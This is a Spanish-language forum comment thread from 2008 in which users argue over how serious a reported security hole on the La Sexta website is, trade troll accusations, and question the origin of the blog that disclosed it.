#84: Señor "experto en seguridad", sólo podrás hacer eso si el admin es tan tonto de pinchar en tu exploit o no navegar con el NoScript (algo BASICO si sabes algo de seguridad y administras una web)
Es decir, para conseguir la cookie de admin, admin debe ejecutar el exploit. Y aunque lo ejecutara. sólo podrías modificar su foro, no la web completa...
Saludos de un "lammer"
Que cansinos con el tema... #82 Aceptas ya que el fallo existe? ...Independientemente de si es grave o no...
#87: No lo llevo diciendo hace muchos posts? El fallo existe pero no es grave. Sería grave si el admin ejecutara el script y además con esa cookie se tuviera acceso de escritura a toda la web.
Prueba de ello es que aun nadie ha modificado la web. A estar alturas deberia estar ya modificada.
#88 no te das cuenta que nadie quiere demostrar nada? que eres tu el unico que le sigue dando vueltas a todo?
Estamos entrando como bobos en el juego de un troll (yo incluido).
Estamos hablando en términos de seguridad mas o menos serios, que nos importa lo que diga un troll que ya se ha visto que solo busca crear un flame? es un troll de libro.
ya lo dije arriba: DON'T FEED THE TROLL
Va a continuar diciendo lo que dice una y otra vez, para alargar el flame.
Doy por concluida mi intervencion en esta "noticia"
Quien tenga ojos que lea.
Una nota antes de cerrar,
El blog "desvarios informáticos" (por cierto nombre apropiado) fue creado el 28-8-2008 a las 21:05
Sólo tiene dos artículos, creados a la misma hora...
Hmmm... aquí alguien quiere ocultar algo!
http://rooibo.wordpress.com/2008/08/28/agujero-de-seguridad-grave-en-la-sexta/
No habia caido en eso #92 pero como decia en #67, además, la idea y el concepto estan plagiados ...
Los comentarios de la noticia son pura poesía
http://rooibo.wordpress.com/2008/08/28/agujero-de-seguridad-grave-en-la-sexta/#comment-29
#93 que la idea y el concepto están plagiados? es interesante ver que ahora hasta el "buscar bugs" tiene copyright, y se puede plagiar, incluso cuando es en sites diferentes.
Cuanto daño hace la sgae
Ojo con el trol que anda llamando 'juankers' a los demás y no sabe lo que son los parámetros URL: panfleto-digital-libertad-digital#comment-3